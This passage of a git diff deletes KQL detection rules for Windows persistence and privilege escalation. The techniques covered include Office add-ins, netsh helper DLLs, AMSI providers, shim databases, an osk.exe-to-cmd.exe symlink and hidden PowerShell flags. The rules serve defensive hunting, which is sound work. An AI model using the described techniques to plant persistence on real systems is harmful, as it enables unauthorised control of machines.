Date: 2019/01/12 -// Level: medium -// Description: Detects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors -// Tags: attack.t1037.001, attack.persistence, attack.lateral_movement -DeviceRegistryEvents -| where ActionType =~ "RegistryKeyCreated" and RegistryKey contains "UserInitMprLogonScript" \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Via_Microsoft_Compatibility_Appraiser.kql b/Persistence/Potential_Persistence_Via_Microsoft_Compatibility_Appraiser.kql deleted file mode 100644 index da19a9b2..00000000 --- a/Persistence/Potential_Persistence_Via_Microsoft_Compatibility_Appraiser.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Sreeman -// Date: 2020/09/29 -// Level: medium -// Description: Detects manual execution of the "Microsoft Compatibility Appraiser" task via schtasks. -In order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" registry key. - -// Tags: attack.persistence, attack.t1053.005 -DeviceProcessEvents -| where (ProcessCommandLine contains "run " and ProcessCommandLine contains "\\Application Experience\\Microsoft Compatibility Appraiser") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Via_Microsoft_Office_Add-In.kql b/Persistence/Potential_Persistence_Via_Microsoft_Office_Add-In.kql deleted file mode 100644 index c04b65b2..00000000 --- a/Persistence/Potential_Persistence_Via_Microsoft_Office_Add-In.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: NVISO -// Date: 2020/05/11 -// Level: high -// Description: Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel). -// Tags: attack.persistence, attack.t1137.006 -DeviceFileEvents -| where (FolderPath contains "\\Microsoft\\Addins\\" and (FolderPath endswith ".xlam" or FolderPath endswith ".xla" or FolderPath endswith ".ppam")) or (FolderPath contains "\\Microsoft\\Word\\Startup\\" and FolderPath endswith ".wll") or (FolderPath contains "Microsoft\\Excel\\XLSTART\\" and FolderPath endswith ".xlam") or (FolderPath contains "\\Microsoft\\Excel\\Startup\\" and FolderPath endswith ".xll") \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Via_Microsoft_Office_Startup_Folder.kql b/Persistence/Potential_Persistence_Via_Microsoft_Office_Startup_Folder.kql deleted file mode 100644 index 8cd7e149..00000000 --- a/Persistence/Potential_Persistence_Via_Microsoft_Office_Startup_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Max Altgelt (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/06/02 -// Level: high -// Description: Detects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence. -// Tags: attack.persistence, attack.t1137 -DeviceFileEvents -| where (((FolderPath endswith ".doc" or FolderPath endswith ".docm" or FolderPath endswith ".docx" or FolderPath endswith ".dot" or FolderPath endswith ".dotm" or FolderPath endswith ".rtf") and (FolderPath contains "\\Microsoft\\Word\\STARTUP" or (FolderPath contains "\\Office" and FolderPath contains "\\Program Files" and FolderPath contains "\\STARTUP"))) or ((FolderPath endswith ".xls" or FolderPath endswith ".xlsm" or FolderPath endswith ".xlsx" or FolderPath endswith ".xlt" or FolderPath endswith ".xltm") and (FolderPath contains "\\Microsoft\\Excel\\XLSTART" or (FolderPath contains "\\Office" and FolderPath contains "\\Program Files" and FolderPath contains "\\XLSTART")))) and (not((InitiatingProcessFolderPath endswith "\\WINWORD.exe" or InitiatingProcessFolderPath endswith "\\EXCEL.exe"))) \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Via_Mpnotify.kql b/Persistence/Potential_Persistence_Via_Mpnotify.kql deleted file mode 100644 index aa6f3b3c..00000000 --- a/Persistence/Potential_Persistence_Via_Mpnotify.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/21 -// Level: high -// Description: Detects when an attacker register a new SIP provider for persistence and defense evasion -// Tags: attack.persistence -DeviceRegistryEvents -| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\mpnotify" \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Via_MyComputer_Registry_Keys.kql b/Persistence/Potential_Persistence_Via_MyComputer_Registry_Keys.kql deleted file mode 100644 index 2439e7ac..00000000 --- a/Persistence/Potential_Persistence_Via_MyComputer_Registry_Keys.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/09 -// Level: high -// Description: Detects modification to the "Default" value of the "MyComputer" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example) -// Tags: attack.persistence -DeviceRegistryEvents -| where RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer" and RegistryKey endswith "(Default)" \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Via_Netsh_Helper_DLL.kql b/Persistence/Potential_Persistence_Via_Netsh_Helper_DLL.kql deleted file mode 100644 index 5512073b..00000000 --- a/Persistence/Potential_Persistence_Via_Netsh_Helper_DLL.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Victor Sergeev, oscd.community -// Date: 2019/10/25 -// Level: medium -// Description: Detects the execution of netsh with "add helper" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed. - -// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.007, attack.s0108 -DeviceProcessEvents -| where (ProcessCommandLine contains "add" and ProcessCommandLine contains "helper") and (ProcessVersionInfoOriginalFileName =~ "netsh.exe" or FolderPath endswith "\\netsh.exe") \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Via_Netsh_Helper_DLL_-_Registry.kql b/Persistence/Potential_Persistence_Via_Netsh_Helper_DLL_-_Registry.kql deleted file mode 100644 index 95c6d258..00000000 --- a/Persistence/Potential_Persistence_Via_Netsh_Helper_DLL_-_Registry.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Anish Bogati -// Date: 2023/11/28 -// Level: medium -// Description: Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper - -// Tags: attack.persistence, attack.t1546.007 -DeviceRegistryEvents -| where RegistryValueData contains ".dll" and RegistryKey contains "\\SOFTWARE\\Microsoft\\NetSh" \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Via_New_AMSI_Providers_-_Registry.kql b/Persistence/Potential_Persistence_Via_New_AMSI_Providers_-_Registry.kql deleted file mode 100644 index 7f67469f..00000000 --- a/Persistence/Potential_Persistence_Via_New_AMSI_Providers_-_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/21 -// Level: high -// Description: Detects when an attacker registers a new AMSI provider in order to achieve persistence -// Tags: attack.persistence -DeviceRegistryEvents -| where (ActionType =~ "RegistryKeyCreated" and (RegistryKey contains "\\SOFTWARE\\Microsoft\\AMSI\\Providers" or RegistryKey contains "\\SOFTWARE\\WOW6432Node\\Microsoft\\AMSI\\Providers")) and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\"))) \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Via_Notepad++_Plugins.kql b/Persistence/Potential_Persistence_Via_Notepad++_Plugins.kql deleted file mode 100644 index af2c5ac8..00000000 --- a/Persistence/Potential_Persistence_Via_Notepad++_Plugins.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/06/10 -// Level: medium -// Description: Detects creation of new ".dll" files inside the plugins directory of a notepad++ installation by a process other than "gup.exe". Which could indicates possible persistence -// Tags: attack.persistence -DeviceFileEvents -| where (FolderPath contains "\\Notepad++\\plugins\\" and FolderPath endswith ".dll") and (not((InitiatingProcessFolderPath endswith "\\Notepad++\\updater\\gup.exe" or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and (InitiatingProcessFolderPath endswith "\\target.exe" or InitiatingProcessFolderPath endswith "Installer.x64.exe") and InitiatingProcessFolderPath startswith "C:\\Users\\")))) \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Via_Outlook_Form.kql b/Persistence/Potential_Persistence_Via_Outlook_Form.kql deleted file mode 100644 index 05b0a258..00000000 --- a/Persistence/Potential_Persistence_Via_Outlook_Form.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Tobias Michalski (Nextron Systems) -// Date: 2021/06/10 -// Level: high -// Description: Detects the creation of a new Outlook form which can contain malicious code -// Tags: attack.persistence, attack.t1137.003 -DeviceFileEvents -| where InitiatingProcessFolderPath endswith "\\outlook.exe" and (FolderPath contains "\\AppData\\Local\\Microsoft\\FORMS\\IPM" or FolderPath contains "\\Local Settings\\Application Data\\Microsoft\\Forms") \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Via_Outlook_Home_Page.kql b/Persistence/Potential_Persistence_Via_Outlook_Home_Page.kql deleted file mode 100644 index 286ac042..00000000 --- a/Persistence/Potential_Persistence_Via_Outlook_Home_Page.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Tobias Michalski (Nextron Systems) -// Date: 2021/06/09 -// Level: high -// Description: Detects potential persistence activity via outlook home pages. -// Tags: attack.persistence, attack.t1112 -DeviceRegistryEvents -| where ((RegistryKey contains "\\Software\\Microsoft\\Office" or RegistryKey contains "\\Outlook\\WebView") and RegistryKey endswith "\\URL") and (RegistryKey contains "\\Calendar" or RegistryKey contains "\\Inbox") \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Via_Outlook_LoadMacroProviderOnBoot_Setting.kql b/Persistence/Potential_Persistence_Via_Outlook_LoadMacroProviderOnBoot_Setting.kql deleted file mode 100644 index 8bbd5aeb..00000000 --- a/Persistence/Potential_Persistence_Via_Outlook_LoadMacroProviderOnBoot_Setting.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2021/04/05 -// Level: high -// Description: Detects the modification of Outlook setting "LoadMacroProviderOnBoot" which if enabled allows the automatic loading of any configured VBA project/module -// Tags: attack.persistence, attack.command_and_control, attack.t1137, attack.t1008, attack.t1546 -DeviceRegistryEvents -| where RegistryValueData contains "0x00000001" and RegistryKey endswith "\\Outlook\\LoadMacroProviderOnBoot" \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Via_Outlook_Today_Pages.kql b/Persistence/Potential_Persistence_Via_Outlook_Today_Pages.kql deleted file mode 100644 index 55524640..00000000 --- a/Persistence/Potential_Persistence_Via_Outlook_Today_Pages.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Tobias Michalski (Nextron Systems) -// Date: 2021/06/10 -// Level: high -// Description: Detects potential persistence activity via outlook today pages. An attacker can set a custom page to execute arbitrary code and link to it via the registry key "UserDefinedUrl". -// Tags: attack.persistence, attack.t1112 -DeviceRegistryEvents -| where (RegistryKey contains "Software\\Microsoft\\Office" and RegistryKey contains "\\Outlook\\Today") and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "Stamp") or RegistryKey endswith "UserDefinedUrl") and (not((InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\")))) \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Via_Powershell_Search_Order_Hijacking_-_Task.kql b/Persistence/Potential_Persistence_Via_Powershell_Search_Order_Hijacking_-_Task.kql deleted file mode 100644 index 7010220a..00000000 --- a/Persistence/Potential_Persistence_Via_Powershell_Search_Order_Hijacking_-_Task.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: pH-T (Nextron Systems), Florian Roth (Nextron Systems) -// Date: 2022/04/08 -// Level: high -// Description: Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell "Get-Variable" technique as seen being used in Colibri Loader -// Tags: attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001 -DeviceProcessEvents -| where (ProcessCommandLine endswith " -windowstyle hidden" or ProcessCommandLine endswith " -w hidden" or ProcessCommandLine endswith " -ep bypass" or ProcessCommandLine endswith " -noni") and (InitiatingProcessCommandLine contains "-k netsvcs" and InitiatingProcessCommandLine contains "-s Schedule") and InitiatingProcessFolderPath =~ "C:\\WINDOWS\\System32\\svchost.exe" \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Via_Scrobj.dll_COM_Hijacking.kql b/Persistence/Potential_Persistence_Via_Scrobj.dll_COM_Hijacking.kql deleted file mode 100644 index 40b586b7..00000000 --- a/Persistence/Potential_Persistence_Via_Scrobj.dll_COM_Hijacking.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/08/20 -// Level: medium -// Description: Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute -// Tags: attack.persistence, attack.t1546.015 -DeviceRegistryEvents -| where RegistryValueData =~ "C:\\WINDOWS\\system32\\scrobj.dll" and RegistryKey endswith "InprocServer32\\(Default)" \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Via_Shim_Database_In_Uncommon_Location.kql b/Persistence/Potential_Persistence_Via_Shim_Database_In_Uncommon_Location.kql deleted file mode 100644 index 0e1cdf91..00000000 --- a/Persistence/Potential_Persistence_Via_Shim_Database_In_Uncommon_Location.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/08/01 -// Level: high -// Description: Detects the installation of a new shim database where the file is located in a non-default location -// Tags: attack.persistence, attack.t1546.011 -DeviceRegistryEvents -| where (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB" and RegistryKey contains "\\DatabasePath") and (not(RegistryValueData contains ":\\Windows\\AppPatch\\Custom")) \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Via_Shim_Database_Modification.kql b/Persistence/Potential_Persistence_Via_Shim_Database_Modification.kql deleted file mode 100644 index be805d00..00000000 --- a/Persistence/Potential_Persistence_Via_Shim_Database_Modification.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: frack113 -// Date: 2021/12/30 -// Level: medium -// Description: Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. -The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time - -// Tags: attack.persistence, attack.t1546.011 -DeviceRegistryEvents -| where (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom") and (not(RegistryValueData =~ "")) \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Via_TypedPaths.kql b/Persistence/Potential_Persistence_Via_TypedPaths.kql deleted file mode 100644 index dab4531e..00000000 --- a/Persistence/Potential_Persistence_Via_TypedPaths.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/22 -// Level: high -// Description: Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt -// Tags: attack.persistence -DeviceRegistryEvents -| where RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths" and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\SysWOW64\\explorer.exe")))) \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql b/Persistence/Potential_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql deleted file mode 100644 index 96f4cd8e..00000000 --- a/Persistence/Potential_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/06/14 -// Level: medium -// Description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script to run for a specific VM state -// Tags: attack.execution, attack.persistence, attack.t1059 -DeviceProcessEvents -| where (ProcessCommandLine contains " script " and ProcessCommandLine contains " set ") and (FolderPath endswith "\\VMwareToolBoxCmd.exe" or ProcessVersionInfoOriginalFileName =~ "toolbox-cmd.exe") \ No newline at end of file diff --git a/Persistence/Potential_Persistence_Via_Visual_Studio_Tools_for_Office.kql b/Persistence/Potential_Persistence_Via_Visual_Studio_Tools_for_Office.kql deleted file mode 100644 index f0a68dd4..00000000 --- a/Persistence/Potential_Persistence_Via_Visual_Studio_Tools_for_Office.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Bhabesh Raj -// Date: 2021/01/10 -// Level: medium -// Description: Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications. -// Tags: attack.t1137.006, attack.persistence -DeviceRegistryEvents -| where (RegistryKey contains "\\Software\\Microsoft\\Office\\Outlook\\Addins" or RegistryKey contains "\\Software\\Microsoft\\Office\\Word\\Addins" or RegistryKey contains "\\Software\\Microsoft\\Office\\Excel\\Addins" or RegistryKey contains "\\Software\\Microsoft\\Office\\Powerpoint\\Addins" or RegistryKey contains "\\Software\\Microsoft\\VSTO\\Security\\Inclusion") and (not(((InitiatingProcessFolderPath =~ "C:\\Program Files\\AVG\\Antivirus\\RegSvr.exe" and RegistryKey contains "\\Microsoft\\Office\\Outlook\\Addins\\Antivirus.AsOutExt") or (InitiatingProcessFolderPath endswith "\\msiexec.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe") or (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\integrator.exe" or InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\visio.exe") or InitiatingProcessFolderPath endswith "\\Teams.exe"))) \ No newline at end of file diff --git a/Persistence/Potential_PrintNightmare_Exploitation_Attempt.kql b/Persistence/Potential_PrintNightmare_Exploitation_Attempt.kql deleted file mode 100644 index 7040127d..00000000 --- a/Persistence/Potential_PrintNightmare_Exploitation_Attempt.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Bhabesh Raj -// Date: 2021/07/01 -// Level: high -// Description: Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675 -// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574, cve.2021.1675 -DeviceFileEvents -| where InitiatingProcessFolderPath endswith "\\spoolsv.exe" and FolderPath contains "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\" \ No newline at end of file diff --git a/Persistence/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql b/Persistence/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql deleted file mode 100644 index 1a2be179..00000000 --- a/Persistence/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash) -// Date: 2022/12/16 -// Level: high -// Description: Detects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation -DeviceFileEvents -| where FolderPath endswith "\\comctl32.dll" and (FolderPath startswith "C:\\Windows\\System32\\logonUI.exe.local" or FolderPath startswith "C:\\Windows\\System32\\werFault.exe.local" or FolderPath startswith "C:\\Windows\\System32\\consent.exe.local" or FolderPath startswith "C:\\Windows\\System32\\narrator.exe.local" or FolderPath startswith "C:\\Windows\\System32\\wermgr.exe.local") \ No newline at end of file diff --git a/Persistence/Potential_Privilege_Escalation_Using_Symlink_Between_Osk_and_Cmd.kql b/Persistence/Potential_Privilege_Escalation_Using_Symlink_Between_Osk_and_Cmd.kql deleted file mode 100644 index c40a0f11..00000000 --- a/Persistence/Potential_Privilege_Escalation_Using_Symlink_Between_Osk_and_Cmd.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/12/11 -// Level: high -// Description: Detects the creation of a symbolic link between "cmd.exe" and the accessibility on-screen keyboard binary (osk.exe) using "mklink". This technique provides an elevated command prompt to the user from the login screen without the need to log in. -// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.008 -DeviceProcessEvents -| where (ProcessCommandLine contains "mklink" and ProcessCommandLine contains "\\osk.exe" and ProcessCommandLine contains "\\cmd.exe") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") \ No newline at end of file diff --git a/Persistence/Potential_Ransomware_or_Unauthorized_MBR_Tampering_Via_Bcdedit.EXE.kql b/Persistence/Potential_Ransomware_or_Unauthorized_MBR_Tampering_Via_Bcdedit.EXE.kql deleted file mode 100644 index 0be2e25f..00000000 --- a/Persistence/Potential_Ransomware_or_Unauthorized_MBR_Tampering_Via_Bcdedit.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: @neu5ron -// Date: 2019/02/07 -// Level: medium -// Description: Detects potential malicious and unauthorized usage of bcdedit.exe -// Tags: attack.defense_evasion, attack.t1070, attack.persistence, attack.t1542.003 -DeviceProcessEvents -| where (ProcessCommandLine contains "delete" or ProcessCommandLine contains "deletevalue" or ProcessCommandLine contains "import" or ProcessCommandLine contains "safeboot" or ProcessCommandLine contains "network") and (FolderPath endswith "\\bcdedit.exe" or ProcessVersionInfoOriginalFileName =~ "bcdedit.exe") \ No newline at end of file diff --git a/Persistence/Potential_Registry_Persistence_Attempt_Via_DbgManagedDebugger.kql b/Persistence/Potential_Registry_Persistence_Attempt_Via_DbgManagedDebugger.kql deleted file mode 100644 index 128c30fe..00000000 --- a/Persistence/Potential_Registry_Persistence_Attempt_Via_DbgManagedDebugger.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/08/07 -// Level: medium -// Description: Detects the addition of the "Debugger" value to the "DbgManagedDebugger" key in order to achieve persistence. Which will get invoked when an application crashes -// Tags: attack.persistence, attack.t1574 -DeviceRegistryEvents -| where RegistryKey endswith "\\Microsoft\\.NETFramework\\DbgManagedDebugger" and (not(RegistryValueData =~ "\"C:\\Windows\\system32\\vsjitdebugger.exe\" PID %d APPDOM %d EXTEXT \"%s\" EVTHDL %d")) \ No newline at end of file diff --git a/Persistence/Potential_Registry_Persistence_Attempt_Via_Windows_Telemetry.kql b/Persistence/Potential_Registry_Persistence_Attempt_Via_Windows_Telemetry.kql deleted file mode 100644 index 3c143992..00000000 --- a/Persistence/Potential_Registry_Persistence_Attempt_Via_Windows_Telemetry.kql +++ /dev/null @@ -1,11 +0,0 @@ -// Author: Lednyov Alexey, oscd.community, Sreeman -// Date: 2020/10/16 -// Level: high -// Description: Detects potential persistence behavior using the windows telemetry registry key. -Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. -This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. -The problem is, it will run any arbitrary command without restriction of location or type. - -// Tags: attack.persistence, attack.t1053.005 -DeviceRegistryEvents -| where ((RegistryValueData contains ".bat" or RegistryValueData contains ".bin" or RegistryValueData contains ".cmd" or RegistryValueData contains ".dat" or RegistryValueData contains ".dll" or RegistryValueData contains ".exe" or RegistryValueData contains ".hta" or RegistryValueData contains ".jar" or RegistryValueData contains ".js" or RegistryValueData contains ".msi" or RegistryValueData contains ".ps" or RegistryValueData contains ".sh" or RegistryValueData contains ".vb") and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController" and RegistryKey endswith "\\Command") and (not((RegistryValueData contains "\\system32\\CompatTelRunner.exe" or RegistryValueData contains "\\system32\\DeviceCensus.exe"))) \ No newline at end of file diff --git a/Persistence/Potential_RipZip_Attack_on_Startup_Folder.kql b/Persistence/Potential_RipZip_Attack_on_Startup_Folder.kql deleted file mode 100644 index 3ae13744..00000000 --- a/Persistence/Potential_RipZip_Attack_on_Startup_Folder.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Greg (rule) -// Date: 2022/07/21 -// Level: high -// Description: Detects a phishing attack which expands a ZIP file containing a malicious shortcut. -If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder. -Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation. - -// Tags: attack.persistence, attack.t1547 -DeviceFileEvents -| where InitiatingProcessFolderPath endswith "\\explorer.exe" and (FolderPath contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" and FolderPath contains ".lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}") \ No newline at end of file diff --git a/Persistence/Potential_SentinelOne_Shell_Context_Menu_Scan_Command_Tampering.kql b/Persistence/Potential_SentinelOne_Shell_Context_Menu_Scan_Command_Tampering.kql deleted file mode 100644 index 38a023b8..00000000 --- a/Persistence/Potential_SentinelOne_Shell_Context_Menu_Scan_Command_Tampering.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024/03/06 -// Level: medium -// Description: Detects potentially suspicious changes to the SentinelOne context menu scan command by a process other than SentinelOne. -// Tags: attack.persistence -DeviceRegistryEvents -| where RegistryKey contains "\\shell\\SentinelOneScan\\command" and (not(((InitiatingProcessFolderPath endswith "C:\\Program Files\\SentinelOne\\" or InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\SentinelOne\\") or (RegistryValueData contains "\\SentinelScanFromContextMenu.exe" and (RegistryValueData startswith "C:\\Program Files\\SentinelOne\\Sentinel Agent" or RegistryValueData startswith "C:\\Program Files (x86)\\SentinelOne\\Sentinel Agent"))))) \ No newline at end of file diff --git a/Persistence/Potential_Shim_Database_Persistence_via_Sdbinst.EXE.kql b/Persistence/Potential_Shim_Database_Persistence_via_Sdbinst.EXE.kql deleted file mode 100644 index 56927dce..00000000 --- a/Persistence/Potential_Shim_Database_Persistence_via_Sdbinst.EXE.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Markus Neis -// Date: 2019/01/16 -// Level: medium -// Description: Detects installation of a new shim using sdbinst.exe. -Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims - -// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.011 -DeviceProcessEvents -| where (ProcessCommandLine contains ".sdb" and (FolderPath endswith "\\sdbinst.exe" or ProcessVersionInfoOriginalFileName =~ "sdbinst.exe")) and (not(((ProcessCommandLine contains ":\\Program Files (x86)\\IIS Express\\iisexpressshim.sdb" or ProcessCommandLine contains ":\\Program Files\\IIS Express\\iisexpressshim.sdb") and InitiatingProcessFolderPath endswith "\\msiexec.exe"))) \ No newline at end of file diff --git a/Persistence/Potential_Startup_Shortcut_Persistence_Via_PowerShell.EXE.kql b/Persistence/Potential_Startup_Shortcut_Persistence_Via_PowerShell.EXE.kql deleted file mode 100644 index 8729ce64..00000000 --- a/Persistence/Potential_Startup_Shortcut_Persistence_Via_PowerShell.EXE.kql +++ /dev/null @@ -1,11 +0,0 @@ -// Author: Christopher Peacock '@securepeacock', SCYTHE -// Date: 2021/10/24 -// Level: high -// Description: Detects PowerShell writing startup shortcuts. -This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence. -Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats. -In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL" - -// Tags: attack.persistence, attack.t1547.001 -DeviceFileEvents -| where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and FolderPath contains "\\start menu\\programs\\startup\\" and FolderPath endswith ".lnk" \ No newline at end of file diff --git a/Persistence/Potential_Suspicious_Activity_Using_SeCEdit.kql b/Persistence/Potential_Suspicious_Activity_Using_SeCEdit.kql deleted file mode 100644 index e8d18e0e..00000000 --- a/Persistence/Potential_Suspicious_Activity_Using_SeCEdit.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Janantha Marasinghe -// Date: 2022/11/18 -// Level: medium -// Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy -// Tags: attack.discovery, attack.persistence, attack.defense_evasion, attack.credential_access, attack.privilege_escalation, attack.t1562.002, attack.t1547.001, attack.t1505.005, attack.t1556.002, attack.t1562, attack.t1574.007, attack.t1564.002, attack.t1546.008, attack.t1546.007, attack.t1547.014, attack.t1547.010, attack.t1547.002, attack.t1557, attack.t1082 -DeviceProcessEvents -| where (FolderPath endswith "\\secedit.exe" or ProcessVersionInfoOriginalFileName =~ "SeCEdit") and ((ProcessCommandLine contains "/configure" and ProcessCommandLine contains "/db") or (ProcessCommandLine contains "/export" and ProcessCommandLine contains "/cfg")) \ No newline at end of file diff --git a/Persistence/Potential_Suspicious_PowerShell_Module_File_Created.kql b/Persistence/Potential_Suspicious_PowerShell_Module_File_Created.kql deleted file mode 100644 index 9bfc80e6..00000000 --- a/Persistence/Potential_Suspicious_PowerShell_Module_File_Created.kql +++ /dev/null @@ -1,7 +0,0 @@ -// 